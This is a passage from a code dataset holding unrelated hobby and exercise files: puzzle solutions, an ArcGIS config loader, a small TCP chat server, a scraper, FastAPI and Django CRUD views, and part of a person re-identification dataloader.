s\n\nprint(bestState)\nprint(bestState.code)\n\nprint(bestAllKeys)\nprint(bestAllKeysState)","repo_name":"Bajron/aoc2019","sub_path":"day18b.py","file_name":"day18b.py","file_ext":"py","file_size_in_byte":4755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16344634445","text":"__version__ = \"1.4\"\n'''\n__author__ = \"Simon Geigenberger, Lukas Bug\"\n__copyright__ = \"Copyright 2018, Esri Deutschland GmbH\"\n__license__ = \"Apache-2.0\"\n__version__ = \"1.4\"\n__email__ = 
\"simon@geigenberger.info, lukas.bug@aol.de\"\n'''\n\nimport json\nimport sys\n\ndef readConfig():\n    dictAGOLConfig = {}\n    \n    #Try to import the ArcGIS API for Python\n    try:\n        from arcgis.gis import GIS\n    except:\n        print(\"ArcGIS API for Python cannot be imported\")\n        sys.exit()\n    \n    #Check version of ArcGIS API for Python <= 1.5.0\n    import arcgis\n    v = int(arcgis.__version__.replace(\".\", \"\"))\n    if v > 150:\n        print(\"ArcGIS API for Python is newer than the version required by this module, please install ArcGIS API for Python 1.5.0 or a previous version.\")\n        sys.exit()\n    \n    #Try to open the config file.\n    try:\n        json_data = open(\"agolconfig.json\").read()\n    except:\n        print(\"JSON file does not exist.\")\n        sys.exit()\n    \n    #Try to load the config file as JSON.\n    try:\n        data = json.loads(json_data)\n    except:\n        print(\"JSON file cannot be read.\")\n        sys.exit()\n    \n    #Check if a portal is selected\n    try:\n        portalInit = data[\"portalInit\"]\n        dictAGOLConfig[\"portal\"] = portalInit\n    except:\n        print(\"No Portal chosen.\")\n        sys.exit()\n    \n    #Check if a user is selected\n    try:\n        userInit = data[\"userInit\"]\n        dictAGOLConfig[\"user\"] = userInit\n    except:\n        print(\"No user chosen.\") \n        sys.exit()\n    \n    #Check if a password is selected\n    try:\n        passwordInit = data[\"passwordInit\"]\n        dictAGOLConfig[\"password\"] = passwordInit\n    except:\n        print(\"No password box chosen.\")\n        sys.exit()\n    \n    #Try to connect to the selected portal with the login information.\n    try:\n        GIS(portalInit, userInit, passwordInit)\n    except:\n        print(\"Cannot connect to the portal.\")\n        sys.exit()\n    \n    #Check if a title is selected\n    try:\n        title = data[\"title\"]\n        dictAGOLConfig[\"title\"] = title\n    except:\n        print(\"No title chosen.\")\n        sys.exit()\n    \n    #Check if tags are selected. Remove tags if the string contains only spaces.\n
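    # (added note) the restart loop below re-scans the list each time a blank tag is\n    # removed; an equivalent one-liner in plain Python would be:\n    #     tags = [tag for tag in tags if tag.strip()]\n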
    try:\n        tags = data[\"tags\"]\n        if len(tags) == 0:\n            print(\"No tags chosen - 1.\")\n            sys.exit()\n        should_restart = True\n        while should_restart:\n            should_restart = False\n            for tag in tags:\n                tagTest = tag.lstrip()\n                if len(tagTest) == 0:\n                    tags.remove(tag)\n                    should_restart = True\n        if len(tags) == 0:\n            print(\"No tags chosen - 2.\")\n            sys.exit()\n        else:\n            dictAGOLConfig[\"tags\"] = tags\n    except:\n        print(\"No tags chosen - 3.\")\n        sys.exit()\n    \n    #Check if a description is selected.\n    try:\n        description = data[\"description\"]\n        dictAGOLConfig[\"description\"] = description\n    except:\n        print(\"No description chosen.\")\n        sys.exit()\n    \n    #Check if a copyrightText is selected\n    try:\n        copyrightText = data[\"copyrightText\"]\n        dictAGOLConfig[\"copyrightText\"] = copyrightText\n    except:\n        print(\"No copyrightText chosen.\")\n        sys.exit()\n    \n    #Check if a maxRecordCount is selected\n    try:\n        maxRecordCount = data[\"maxRecordCount\"]\n        dictAGOLConfig[\"maxRecordCount\"] = maxRecordCount\n    except:\n        print(\"No maxRecordCount chosen.\")\n        sys.exit()\n    \n    dictAGOLConfig[\"overwriteService\"] = 0\n    return dictAGOLConfig\n","repo_name":"EsriDE/EsriDE-python-osm2arcgis","sub_path":"AGOLConfigHelper.py","file_name":"AGOLConfigHelper.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"25608502179","text":"# coding=utf-8\n\n'''\nGiven a root node reference of a BST and a key,\ndelete the node with the given key in the BST.\nReturn the root node reference (possibly updated) of the BST.\n\nBasically, the deletion can be divided into two stages:\n\nSearch for a node to remove.\nIf the node is found, delete the node.\nNote: Time complexity should be O(height of tree).\n\nExample:\n\nroot = [5,3,6,2,4,null,7]\nkey = 3\n\n    5\n   / \\\n  3   6\n / \\   \\\n2   4   7\n\nGiven key to delete is 3. 
So we find the node with value 3 and delete it.\n\nOne valid answer is [5,4,6,2,null,null,7], shown in the following BST.\n\n    5\n   / \\\n  4   6\n /     \\\n2       7\n\nAnother valid answer is [5,2,6,null,4,null,7].\n\n  5\n / \\\n2   6\n \\   \\\n  4   7\n'''\n\n'''\nOne of the most important binary-tree operations in any algorithms textbook. The hard part of\nthis problem is that there is no parent-pointer information, so the only option is the runner\ntechnique: keep a trailing pointer to the previously visited node, which brings in a lot of\nboundary cases. The helper that finds the successor node, unlinks it and returns it is also\nfairly involved.\nBeat 67.87%\nCompany: Uber\n'''\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution(object):\n    def FM(self, base, root):\n        \"\"\"\n        :type base: the parent of the starting node root, so unlinking works even when root itself is the successor\n        :type root: the right child of base\n        \"\"\"\n        pre, cur = None, root\n        while cur.left:\n            pre = cur\n            cur = cur.left\n        if cur == root:  # root itself is the successor\n            pre = base\n            pre.right = cur.right\n            return cur\n        if not cur.right:  # the successor has no right child\n            pre.left = None\n            return cur\n        else:  # the successor has no left child, so attach its right subtree\n            pre.left = cur.right\n            return cur\n\n    def deleteNode(self, root, key):\n        \"\"\"\n        :type root: TreeNode\n        :type key: int\n        :rtype: TreeNode\n        \"\"\"\n        head, cur = TreeNode('dummy'), root  # dummy node so a single-node tree is deleted correctly\n        pre = head\n        pre.right = cur\n        while cur:  # search phase\n            if cur.val < key:\n                pre = cur\n                cur = cur.right\n            elif cur.val > key:\n                pre = cur\n                cur = cur.left\n            else:\n                break\n\n        if not cur: return root  # the key is not in the tree\n\n        if not cur.left and not cur.right:  # the node to delete is a leaf\n            if pre.left == cur:\n                pre.left = None\n            else:\n                pre.right = None\n        elif not cur.left:\n            if pre.left == cur:\n                pre.left = cur.right\n            else:\n                pre.right = cur.right\n        elif not cur.right:\n            if pre.left == cur:\n                pre.left = cur.left\n            else:\n                pre.right = cur.left\n        else:  # the node to delete has both children\n            node = self.FM(cur, cur.right)\n            if pre.left == cur:\n                pre.left = node\n            else:\n                pre.right = node\n            node.left = cur.left\n            node.right = cur.right\n        return head.right\n","repo_name":"sindwerra/Algorithms","sub_path":"Leetcode/Tree/#450-Delete Node in a BST/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3369,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"35"} +{"seq_id":"23402018832","text":"# coding=utf-8\n\n\"\"\"\nProblem: given the head node of a singly linked list, reverse the list and return the reversed list.\nSolution 1: shown as a sequence of list states\nS0: None; 1 - 2 - 3 - 4 - 5\nS1: 1; 2 - 3 - 4 - 5\nS2: 2 - 1; 3 - 4 - 5\nS3: 3 - 2 - 1; 4 - 5\nS4: 4 - 3 - 2 - 1; 5\nS5: 5 - 4 - 3 - 2 - 1; None\nThe right-hand list state matches the loop state of head = head.next.\nThe left-hand side starts as None and gradually becomes the reversed head, which is the result,\nso a variable res is needed to hold the left-hand list state,\nand tmp is needed to head-insert each node in front of the left-hand head.\n\"\"\"\n\n\ndef reverseList(head):\n    res = None\n    while head:\n        tmp = head\n        head = head.next\n        tmp.next = res\n        res = tmp\n    return res\n\n\nif __name__ == \"__main__\":\n    from Algorithm.AlgorithmPython.CodeTop.ListNodeQuestion.tools.define import list_to_listnode, listnode_to_list\n    test_head = list_to_listnode([1, 2, 3, 4, 5])\n\n    # test for reverseList\n    reversed_head = reverseList(test_head)\n    print(listnode_to_list(reversed_head))\n","repo_name":"ALeftHanded/blog-doc","sub_path":"Algorithm/AlgorithmPython/ListNodeQuestion/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17683189119","text":"import sympy\nfrom eulerlib import primes\nimport itertools\nfrom collections import Counter\n\n\ndef main():\n\n    x = prime_pair_sets(10000, 5)\n    print(x)\n\n\ndef prime_pair_sets(n, set_len):\n    prime_list = primes(n)\n    len_prime_list = len(prime_list)\n    prime_pairs = {}\n\n    for i in range(0, len_prime_list, 1):\n        counterparts = []\n
        for j in range(i + 1, len_prime_list, 1):\n            if is_prime_pair((prime_list[i], prime_list[j])):\n                counterparts.append(prime_list[j])\n        if len(counterparts) > 1:\n            prime_pairs[prime_list[i]] = counterparts\n\n    results = [[digit] for digit in prime_list]\n\n    while set_len > 1:\n        temp_results = []\n        for result in results:\n            potential_pairs = prime_pairs.get(result[-1])\n            if potential_pairs:\n                for k in range(0, len(result) - 1, 1):\n                    another_potential_pair = prime_pairs.get(result[k])\n                    potential_pairs = list((Counter(potential_pairs) & Counter(another_potential_pair)).elements())\n                if potential_pairs:\n                    for potential_pair in potential_pairs:\n                        temp_results.append(result + [potential_pair])\n        results = temp_results\n        set_len -= 1\n\n    return min([sum(digits) for digits in results])\n\n\ndef is_prime_pair(n_pair):\n    return sympy.isprime(int(str(n_pair[0]) + str(n_pair[1]))) and sympy.isprime(int(str(n_pair[1]) + str(n_pair[0])))\n\n\nif __name__ == \"__main__\":\n    main()\n\n","repo_name":"ninomarlou/project-euler","sub_path":"60-prime-pair-sets.py","file_name":"60-prime-pair-sets.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"10892321871","text":"import socket # https://docs.python.org/3/library/socket.html\nimport threading # https://docs.python.org/3/library/threading.html\nimport sys\n\n# AF_INET: IPv4\n# SOCK_STREAM: TCP, SOCK_DGRAM: UDP\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\naddr = sys.argv[1]\nport = 9999\nprint('addr: ' + addr + ':' + str(port))\nsock.bind((addr, port))\n\nsock.listen(1)\n\nconnections = []\n\ndef handler(c, a):\n    global connections\n    while True:\n        data = c.recv(1024) # bytes\n        print('get data: ' + str(data))\n        for connection in connections:\n            pass\n            #connection.send(bytes(data))\n        if not data:\n            connections.remove(c)\n            c.close()\n            break\n\ndef input_handler(c, a):\n    global connections\n    while True:\n        for connection in connections:\n            connection.send(bytes(input(\"\") + '\\r\\n', 'utf-8'))\n\nwhile True:\n    connection, client_address = sock.accept()\n    cThread = threading.Thread(target=handler, args=(connection, client_address))\n    cThread.daemon = True\n    cThread.start()\n    connections.append(connection)\n    print(connections)\n\n    sThread = threading.Thread(target=input_handler, args=(connection, client_address))\n    sThread.daemon = True\n    sThread.start()\n\n\"\"\"\n# Server can send msg to all client. 
Client can send msg to server.\n\n# Server\npython server-a20180413.py 127.0.0.1\n# Client\ntelnet 127.0.0.1 9999\n\"\"\"\n","repo_name":"lovenery/DPDPP","sub_path":"server-a20180413.py","file_name":"server-a20180413.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15412495560","text":"import requests\nimport json\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n \nresponse = requests.get(\"https://calendar.zoznam.sk/sunset-sk.php?city=3058531\")\nsoup = BeautifulSoup(response.text, 'html.parser')\n\nmydivs = soup.find_all(\"div\", {\"class\": \"calendar\"})\n\nyear = {}\nnumber_of_month = 0\n\nfor div in mydivs:\n\n    days_in_month = 0\n    number_of_month += 1\n    months = {}\n    \n    month = div.h2.text\n    tds = div.find_all(\"span\", {\"class\": \"number\"})\n    days = {}\n    \n    for td in tds:\n        day = td.parent.text\n        days_in_month += 1\n        # sun_set = day.rsplit('Západ:')\n        # sun_rise = day.split('Vychod:')\n        days[days_in_month] = day\n    \n\n    months[\"number of month\"] = number_of_month\n    months[\"days in month\"] = days_in_month\n    months[\"days data\"] = days\n    year[month] = months\n\n\n\nwith open('output.json', 'w') as json_file:\n    json.dump(year, json_file)\n\n","repo_name":"norbertbago/data_mini_projects","sub_path":"sun-rise_sun-set_stat2021/project_files/data_scaping.py","file_name":"data_scaping.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"9188169210","text":"from fastapi import HTTPException, status\r\n\r\n\r\nfrom app.v1.model.location_model import Location as LocationModel\r\nfrom app.v1.model.pets_model import Pets as PetsModel\r\nfrom app.v1.schema import location_schema\r\n\r\n\r\ndef create_location(location: location_schema.LocationBase):\r\n    get_location = LocationModel.filter(LocationModel.name_city_location == location.name_city_location).first()\r\n    if get_location:\r\n        if get_location.name_city_location == location.name_city_location:\r\n            msg = \"City already exists\"\r\n            raise HTTPException(\r\n                status_code=status.HTTP_400_BAD_REQUEST,\r\n                detail=msg\r\n            )\r\n\r\n    db_location = LocationModel(\r\n        name_city_location = location.name_city_location,\r\n        longitude_location = location.longitude_location,\r\n        latitude_location = location.latitude_location\r\n    )\r\n\r\n    db_location.save()\r\n\r\n    return location_schema.Location(\r\n        id = db_location.id,\r\n        name_city_location = db_location.name_city_location,\r\n        longitude_location = db_location.longitude_location,\r\n        latitude_location = db_location.latitude_location\r\n    )\r\n\r\ndef get_location(id: int):\r\n    location = LocationModel.filter(LocationModel.id == id).first()\r\n    if not location:\r\n        raise HTTPException(\r\n            status_code=status.HTTP_404_NOT_FOUND,\r\n            detail=\"Location not found\"\r\n        )\r\n\r\n    return location_schema.Location(\r\n        id = location.id,\r\n        name_city_location= location.name_city_location,\r\n        latitude_location= location.latitude_location,\r\n        longitude_location= location.longitude_location\r\n    )\r\n\r\ndef get_list_locations():\r\n    list_location = []\r\n
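    # (added note) the id scan below probes ids 0..99 one query at a time; a single\r\n    # LocationModel.select() over the table (peewee-style, matching the filter()\r\n    # calls used above) would fetch every row at once.\r\n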
    for i in range(0, 100):\r\n        location = LocationModel.filter((LocationModel.id == i)).first()\r\n        if location is None:\r\n            continue\r\n        else:\r\n            list_location.append(location_schema.Location(\r\n                id = location.id,\r\n                name_city_location= location.name_city_location,\r\n                latitude_location= location.latitude_location,\r\n                longitude_location= location.longitude_location\r\n            ))\r\n    return list_location\r\n\r\n\r\ndef delete_location(location_id: int):\r\n    location = LocationModel.filter((LocationModel.id == location_id)).first()\r\n    pets = PetsModel.filter((PetsModel.location == location_id)).first()\r\n\r\n    if pets is not None:\r\n        raise HTTPException(\r\n            status_code= status.HTTP_400_BAD_REQUEST,\r\n            detail= \"Location cannot be deleted, it is still in use\"\r\n        )\r\n\r\n    if location is None:\r\n        raise HTTPException(\r\n            status_code= status.HTTP_400_BAD_REQUEST,\r\n            detail= \"Location not found\"\r\n        )\r\n\r\n    location.delete_instance()\r\n\r\n\r\n\r\n","repo_name":"Juanma1023/pet_adoption_api","sub_path":"App/v1/service/location_service.py","file_name":"location_service.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"28409935430","text":"from __future__ import print_function\nfrom db_util import Symptom, RelatedSymptom, Disease, RelatedDisease\n\n\ndef select_related_symptoms(symptom_ids):\n    ''' select all symptoms related to the given symptom_ids\n    Args:\n        symptom_ids: list of symptom ids that need to be queried, e.g. [1, 2]\n    Return:\n        related_symptoms: list of (symptom_name, rank) pairs\n    '''\n    symptom_ids = sorted(symptom_ids)\n    symptom_ids_key = '|'.join(symptom_ids)\n    query_related_symptoms = Symptom\\\n        .select(Symptom, RelatedSymptom.rank) \\\n        .join(RelatedSymptom, on=(RelatedSymptom.related_symptom_id == Symptom.id)) \\\n        .where(RelatedSymptom.main_symptom_id == symptom_ids_key) \\\n        .order_by(RelatedSymptom.rank.desc())\n\n    related_symptoms = []\n    for r in query_related_symptoms:\n        related_symptoms.append((r.name, r.related_symptom[0].rank))\n        # related_symptoms.append(r.name)\n    return related_symptoms\n\n\ndef select_related_diseases(symptom_id):\n    ''' select all diseases related to the given symptom_id\n    Args:\n        symptom_id: integer, the symptom_id that needs to be queried\n    Returns:\n        related_diseases:\n    '''\n    query_related_diseases = Disease\\\n        .select(Disease, RelatedDisease) \\\n        .join(RelatedDisease, on=(RelatedDisease.related_disease_id == Disease.id)) \\\n        .where(RelatedDisease.main_symptom_id == symptom_id)\n\n    related_diseases = []\n    for r in query_related_diseases:\n        # related_diseases.append((r.title, r.text, r.link))\n        related_diseases.append((r.title, r.text, r.link, r.is_emergency, r.thumbnail))\n    return related_diseases\n\n\ndef select(symptom_names=['Dizziness']):\n\n    # 1. get symptom_ids according to the given symptom_names, could use reverse index\n    query_symptom_ids = Symptom.select().where(Symptom.name << symptom_names)\n    symptom_ids = [str(s.id) for s in query_symptom_ids]\n\n    # 2. select related symptoms\n    ret_symptoms = select_related_symptoms(symptom_ids)\n\n    all_related_diseases = []\n    for symptom_id in symptom_ids:\n        related_diseases = select_related_diseases(symptom_id)\n        all_related_diseases.append(related_diseases)\n\n    # 3. 
get the intersection of given diseases\n    ret_diseases = set(all_related_diseases[0])\n    for s in all_related_diseases[1:]:\n        ret_diseases = ret_diseases.intersection(s)\n    ret_diseases = list(ret_diseases)\n    return ret_symptoms, ret_diseases\n\n\ndef main():\n    symptom_names = ['Dizziness', 'Shortness of Breath']\n    # symptom_names = ['Dizziness']\n    ret = select(symptom_names)\n    print('related_symptoms:', len(ret[0]))\n    print(ret[0])\n    print('\\n----------------------------\\n')\n    print('related_diseases:', len(ret[1]))\n    print(ret[1])\n    return\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"yinchuandong/healthline","sub_path":"data_query.py","file_name":"data_query.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43655077252","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.core.paginator import Paginator\nfrom django.http import Http404\nfrom django.contrib.auth.models import User\nfrom .forms import *\nfrom .models import *\n\ndef index(request):\n    page = request.GET.get('page', '1')  # read the page parameter, defaulting to 1\n    board_list = Board.objects.order_by('-id')\n\n    # pagination\n    paginator = Paginator(board_list, 10)  # show 10 posts per page\n    page_obj = paginator.get_page(page)  # build the paginated object for this page\n    user = request.user\n    context = {'board_list': page_obj,\n               'user': user\n               }  # pass the paginated object (page_obj)\n    return render(request, 'borameboard/index.html', context)\n\n\n\ndef regist(request):\n    if request.method == 'POST':\n        form = RegistForm(request.POST)\n        if form.is_valid():\n            post = form.save()\n            return redirect('borame_board:index')\n    else:\n        form = RegistForm()\n    context = {'form': form,\n               'user': request.user}\n    return render(request, 'borameboard/regist_form.html', context)\n\ndef detail(request, pk):\n    board_list = get_object_or_404(Board, id=pk)\n    context = {'board_list': board_list}\n    return render(request, 'borameboard/detail.html', context)\n\ndef edit(request, pk):\n    post = get_object_or_404(Board, id=pk)\n    if request.method == 'POST':\n        form = RegistForm(request.POST, instance=post)\n        if form.is_valid():\n            post = form.save()\n            return redirect('borame_board:index')\n    else:\n        form = RegistForm(instance=post)\n    context = {'form': form,}\n    return render(request, 'borameboard/edit_form.html', context)\n\ndef delete(request, pk):\n    post = get_object_or_404(Board, id=pk)\n    post.delete()\n    return redirect('borame_board:index')","repo_name":"jckim22/django_board","sub_path":"borameboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"75329166820","text":"# -*- coding: utf-8 -*-\nclass Alumno:\n    def __init__(self, matricula, nombre, apellido, correo, estatus):\n        self.numero_matricula = matricula\n        self.nombre = nombre\n        self.apellido = apellido\n        self.correo_electronico = correo\n        self.estatus_inscrito = estatus\n\nclass Modulo:\n    def __init__(self, fecha_inicio, fecha_fin):\n        self.listado_alumnos = [{\n            'numero_matricula' : 1,\n            'nombre' : 'Fernando',\n            'apellido' : 'Merino',\n            'correo_electronico' : 'fernando@correo.es',\n            'estatus_inscrito' : True\n        },\n        {\n            'numero_matricula' : 2,\n            'nombre' : 'Rosa',\n            'apellido' : 'Artero',\n            'correo_electronico' : 'isabel@correo.es',\n            'estatus_inscrito' : True\n
        },\n        {\n            'numero_matricula' : 3,\n            'nombre' : 'Javier',\n            'apellido' : 'Ugarte',\n            'correo_electronico' : 'jugarte@correo.es',\n            'estatus_inscrito' : True\n        },\n        {\n            'numero_matricula' : 4,\n            'nombre' : 'María',\n            'apellido' : 'López',\n            'correo_electronico' : 'mlopez@correo.es',\n            'estatus_inscrito' : True\n        },\n        {\n            'numero_matricula' : 5,\n            'nombre' : 'José',\n            'apellido' : 'Navarro',\n            'correo_electronico' : 'josenav@correo.es',\n            'estatus_inscrito' : True\n        }\n        ]\n        self.fecha_inicio = fecha_inicio\n        self.fecha_fin = fecha_fin\n\n    def agregar_alumno(self):\n        matricula = self.listado_alumnos[len(self.listado_alumnos) - 1]['numero_matricula'] + 1\n        nombre = raw_input('Enter a first name: ')\n        apellido = raw_input('Enter a last name: ')\n        correo = raw_input('Enter an e-mail: ')\n        alumno = {\n            'numero_matricula' : matricula,\n            'nombre' : nombre,\n            'apellido' : apellido,\n            'correo_electronico' : correo,\n            'estatus_inscrito' : True\n        }\n        self.listado_alumnos.append(alumno)\n\n    def buscar_alumno(self, matricula):\n        if (any(map(lambda person : person['numero_matricula'] == matricula, self.listado_alumnos))):\n            alumno = filter(lambda person : person['numero_matricula'] == matricula, self.listado_alumnos)[0]\n            print('Result:\\nFirst name: %s\\nLast name: %s\\nE-mail: %s' %(alumno['nombre'], alumno['apellido'], alumno['correo_electronico']))\n        else:\n            print('The student is not on the list')\n\n    def mostrar_inscritos(self):\n        listado = 'Enrolled students:\\n\\nEnrolment no., First name, Last name, E-mail\\n'\n        for person in self.listado_alumnos:\n            if (person['estatus_inscrito']):\n                listado += '%s, %s, %s, %s\\n' %(person['numero_matricula'], person['nombre'], person['apellido'], person['correo_electronico'])\n        print(listado)\n\nprebootcamp = Modulo('05/10/2018', '23/11/2018')\n\nwhile True:\n    option = input('Options:\\n(1) Add a student\\n(2) Show all enrolled students\\n(3) Find a student by enrolment number\\n')\n\n    if option == 1:\n        prebootcamp.agregar_alumno()\n    elif option == 2:\n        prebootcamp.mostrar_inscritos()\n    elif option == 3:\n        matricula = input('Enter the enrolment number: ')\n        prebootcamp.buscar_alumno(matricula)\n    else:\n        print('Invalid option. 
Try again.')","repo_name":"Ferveloper/python-exercises","sub_path":"KC_EJ33.py","file_name":"KC_EJ33.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26310535690","text":"from collections import Counter\nimport numpy as np\n\nwith open('in/21.txt') as f:\n    p0, p1 = [int(line.split()[-1]) for line in f.read().splitlines()]\n\n\n# Part 1\n\npos = [p0, p1]\nscores = [0, 0]\ndie = 0\nplayer = 0\nwhile True:\n    pos[player] += 3 * (die % 100 + 1) + 3\n    pos[player] %= 10\n    if pos[player] == 0:\n        pos[player] = 10\n    scores[player] += pos[player]\n    die += 3\n    if scores[player] >= 1000:\n        print(scores[1 - player] * die)\n        break\n    player = 1 - player\n\n\n# Part 2\n\n# pos_count[s] is the number of ways three 3-sided dice sum to s (s = 3..9)\npos_count = np.array([0, 0, 0, 1, 3, 6, 7, 6, 3, 1])\npos_score = np.array([i if i > 0 else 10 for i in range(10)])\n\npos = [p0 % 10, p1 % 10]\nscores = [0, 0]\nplayer = 0\nwins = [0, 0]\n# simul[pos, score] = count\nsimul = [Counter([(pos[0], 0)]), Counter([(pos[1], 0)])]\n\nwhile simul[0] and simul[1]:\n    new_simul = Counter()\n    opp_total = 0\n    for c in simul[1 - player].values():\n        opp_total += c\n    for (p, s), c in simul[player].items():\n        new_counts = c * np.roll(pos_count, p)\n        new_scores = s + pos_score\n        for i in range(10):\n            if new_counts[i] == 0:\n                continue\n            if new_scores[i] >= 21:\n                wins[player] += new_counts[i] * opp_total\n            else:\n                new_simul[(i, new_scores[i])] += new_counts[i]\n    simul[player] = new_simul\n    player = 1 - player\n\nprint(max(wins))\n","repo_name":"BradonZhang/advent-of-code-2021","sub_path":"src/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"20528706212","text":"import data.img_transforms as T\nimport data.spatial_transforms as ST\nimport data.temporal_transforms as TT\nfrom torch.utils.data import DataLoader\nfrom data.dataloader import DataLoaderX\nfrom data.dataset_loader import ImageDataset, VideoDataset\nfrom data.samplers import DistributedRandomIdentitySampler, DistributedInferenceSampler\nfrom data.datasets.ltcc import LTCC\nfrom data.datasets.prcc import PRCC\nfrom data.datasets.last import LaST\nfrom data.datasets.ccvid import CCVID\nfrom data.datasets.deepchange import DeepChange\nfrom data.datasets.vcclothes import VCClothes, VCClothesSameClothes, VCClothesClothesChanging\n\n\n__factory = {\n    'ltcc': LTCC,\n    'prcc': PRCC,\n    'vcclothes': VCClothes,\n    'vcclothes_sc': VCClothesSameClothes,\n    'vcclothes_cc': VCClothesClothesChanging,\n    'last': LaST,\n    'ccvid': CCVID,\n    'deepchange': DeepChange,\n}\n\nVID_DATASET = ['ccvid']\n\n\ndef get_names():\n    return list(__factory.keys())\n\n\ndef build_dataset(config):\n    if config.DATA.DATASET not in __factory.keys():\n        raise KeyError(\"Invalid dataset, got '{}', but expected to be one of {}\".format(config.DATA.DATASET, __factory.keys()))\n\n    if config.DATA.DATASET in VID_DATASET:\n        dataset = __factory[config.DATA.DATASET](root=config.DATA.ROOT, \n                                                 sampling_step=config.DATA.SAMPLING_STEP,\n                                                 seq_len=config.AUG.SEQ_LEN, \n                                                 stride=config.AUG.SAMPLING_STRIDE)\n    else:\n        dataset = __factory[config.DATA.DATASET](root=config.DATA.ROOT)\n\n    return dataset\n\n\ndef build_img_transforms(config):\n    transform_train = T.Compose([\n        T.Resize((config.DATA.HEIGHT, config.DATA.WIDTH)),\n        T.RandomCroping(p=config.AUG.RC_PROB),\n        T.RandomHorizontalFlip(p=config.AUG.RF_PROB),\n        T.ToTensor(),\n        T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 
0.225]),\n        T.RandomErasing(probability=config.AUG.RE_PROB)\n    ])\n    transform_test = T.Compose([\n        T.Resize((config.DATA.HEIGHT, config.DATA.WIDTH)),\n        T.ToTensor(),\n        T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n    ])\n\n    return transform_train, transform_test\n\n\ndef build_vid_transforms(config):\n    spatial_transform_train = ST.Compose([\n        ST.Scale((config.DATA.HEIGHT, config.DATA.WIDTH), interpolation=3),\n        ST.RandomHorizontalFlip(),\n        ST.ToTensor(),\n        ST.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n        ST.RandomErasing(height=config.DATA.HEIGHT, width=config.DATA.WIDTH, probability=config.AUG.RE_PROB)\n    ])\n    spatial_transform_test = ST.Compose([\n        ST.Scale((config.DATA.HEIGHT, config.DATA.WIDTH), interpolation=3),\n        ST.ToTensor(),\n        ST.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n    ])\n\n    if config.AUG.TEMPORAL_SAMPLING_MODE == 'tsn':\n        temporal_transform_train = TT.TemporalDivisionCrop(size=config.AUG.SEQ_LEN)\n    elif config.AUG.TEMPORAL_SAMPLING_MODE == 'stride':\n        temporal_transform_train = TT.TemporalRandomCrop(size=config.AUG.SEQ_LEN, \n                                                         stride=config.AUG.SAMPLING_STRIDE)\n    else:\n        raise KeyError(\"Invalid temporal sampling mode '{}'\".format(config.AUG.TEMPORAL_SAMPLING_MODE))\n\n    temporal_transform_test = None\n\n    return spatial_transform_train, spatial_transform_test, temporal_transform_train, temporal_transform_test\n\n\ndef build_dataloader(config):\n    dataset = build_dataset(config)\n    # video dataset\n    if config.DATA.DATASET in VID_DATASET:\n        spatial_transform_train, spatial_transform_test, temporal_transform_train, temporal_transform_test = build_vid_transforms(config)\n\n        if config.DATA.DENSE_SAMPLING:\n            train_sampler = DistributedRandomIdentitySampler(dataset.train_dense, \n                                                             num_instances=config.DATA.NUM_INSTANCES, \n                                                             seed=config.SEED)\n            # split each original training video into a series of short videos and sample one clip for each short video during training\n            trainloader = DataLoaderX(\n                dataset=VideoDataset(dataset.train_dense, spatial_transform_train, temporal_transform_train),\n                sampler=train_sampler,\n                batch_size=config.DATA.TRAIN_BATCH, num_workers=config.DATA.NUM_WORKERS,\n                pin_memory=True, drop_last=True)\n        else:\n            train_sampler = DistributedRandomIdentitySampler(dataset.train, \n                                                             num_instances=config.DATA.NUM_INSTANCES, \n                                                             seed=config.SEED)\n            # sample one clip for each original training video during training\n            trainloader = DataLoaderX(\n                dataset=VideoDataset(dataset.train, spatial_transform_train, temporal_transform_train),\n                sampler=train_sampler,\n                batch_size=config.DATA.TRAIN_BATCH, num_workers=config.DATA.NUM_WORKERS,\n                pin_memory=True, drop_last=True)\n        \n        # split each original test video into a series of clips and use the averaged feature of all clips as its representation\n        queryloader = DataLoaderX(\n            dataset=VideoDataset(dataset.recombined_query, spatial_transform_test, temporal_transform_test),\n            sampler=DistributedInferenceSampler(dataset.recombined_query),\n            batch_size=config.DATA.TEST_BATCH, num_workers=config.DATA.NUM_WORKERS,\n            pin_memory=True, drop_last=False, shuffle=False)\n        galleryloader = DataLoaderX(\n            